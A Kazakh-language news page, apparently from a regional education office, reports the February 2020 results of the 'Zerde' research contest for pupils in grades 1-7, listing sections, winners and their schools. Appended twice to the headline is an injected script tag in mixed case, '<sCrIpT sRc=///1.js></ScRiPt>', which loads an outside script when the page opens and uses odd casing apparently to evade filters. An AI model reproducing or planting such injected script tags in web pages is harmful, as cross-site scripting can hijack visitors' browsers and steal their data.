2020 жылдың 8 ақпан күні өткен «Зерде» республикалық конкурсының қорытындысы туралы ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

10.02.2020

2020 жылдың 8 ақпан күні Нұрсұлтан қаласында 1-7 сынып оқушыларына арналған XV республикалық «Зерде» байқауының қорытынды кезеңі өткізілді.

Конкурстың негізгі мақсаты: балалардың зерттеу қызметінің дағдыларын дамыту, кіші және орта жастағы мектеп оқушыларының интеллектуалдық-шығармашылық әлеуетін ынталандыру.

Оқушыларының зерттеу жұмыстары төмендегі 8 секциялар бойынша өткізілді:

1 секция - қазақ тілі мен әдебиеті;

2 секция - орыс тілі мен әдебиеті;

3 секция - математика, информатика;

4 секция - физика, техника;

5 секция - медицина, психология;

6 секция - химия, биология;

7 секция - тарих, өлкетану, этномәдениеттану;

8 секция - экология, валеология.

Зерттеу жобаларын қорғау жас ерекшеліктері бойынша екі топқа бөлінді 1-4 және 5-7 сыныптар арасында.

Гран-при -  Каримжанова Бекзат Жақсы ауданы Терісақан орта мектебінің 7 сынып оқушысы.

І дәрежелі дипломмен 9 оқушы марапатталды:

1) Сулейменова Айина - Көкшетау қаласы, ІТ мектеп-лицейінің 5 сынып оқушысы,

2) Тлеулин Нұртас - Көкшетау қаласы, дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының 7 сынып оқушысы;

3) Оразалин Жан - Көкшетау қаласы, №1 орта мектеп-гимназиясының 4 сынып оқушысы;

4) Нұрмахамбет Нұрасыл - Бурабай ауданы, Щучье қаласы №7 орта мектебінің 5 сынып оқушысы;

5) Сейтімхан Кәусар  - Бурабай ауданы, Щучье қаласы №9 мектеп- гимназиясының 6 сынып оқушысы.

6) Аманжол Ақмаржан -  Степногорск қаласы, №9 А. Косерев атындағы орта мектебінің 4 сынып оқушысы;

7) Бақтыбаева Мерей - Степногорск қаласы, №9 А. Косерев атындағы орта мектебінің 4 сынып оқушысы;

8) Ғалым Мәди – Жарқайың ауданы, Крупская орта мектебінің 5 сынып оқушысы;

9) Морозов Никита – Жақсы ауданы, Қима орта мектебінің 4 сынып оқушысы.

 ІІ дәрежелі дипломмен 5 оқушы марапатталды:

1) Мырзатхан Бекарыс – Біржан сал ауданы, Донской орта мектебінің  2 сынып оқушысы;

2) Коротченко Диана - Бурабай ауданы, Щучье қаласы №2 орта мектебінің 4 сынып оқушысы.

3) Габбассов Тимур – Целиноград ауданы, №11 Семиновка орта мектебінің 4 сынып оқушысы;

4) Бурчиц Дмитрий – Степногорск қаласы, Заводской орта мектебінің 5 сынып оқушысы;

5) Сираш Мадина - Целиноград ауданы, Софиевка орта мектебінің 5 сынып оқушысы.

ІІІ дәрежелі дипломмен 3 оқушы марапатталды:

1) Талғатова Сұлу – Аршалы ауданы, Волгодоновка орта мектебінің 3 сынып оқушысы;

2) Қанат Әділхан - Көкшетау қаласы, ІТ мектеп-лицейінің 2 сынып оқушысы;

3) Душкина Виктория – Бурабай ауданы, Досов  атындағы орта мектебінің 7 сынып оқушысы.

Грамотамен 1 оқушы марапатталды:

1) Амет Асанжан – Көкшетау қаласы, гуманитарлық-техникалық мектеп-лицейінің 7 сынып оқушысы.

Жүлдегерлерімізді шын жүректен құттықтаймыз! Әлі талай жетістіктеріңіздің куәсі болайық!

Просмотров: 527


Пікір қосу



Деректерді қолтаңбаға қосу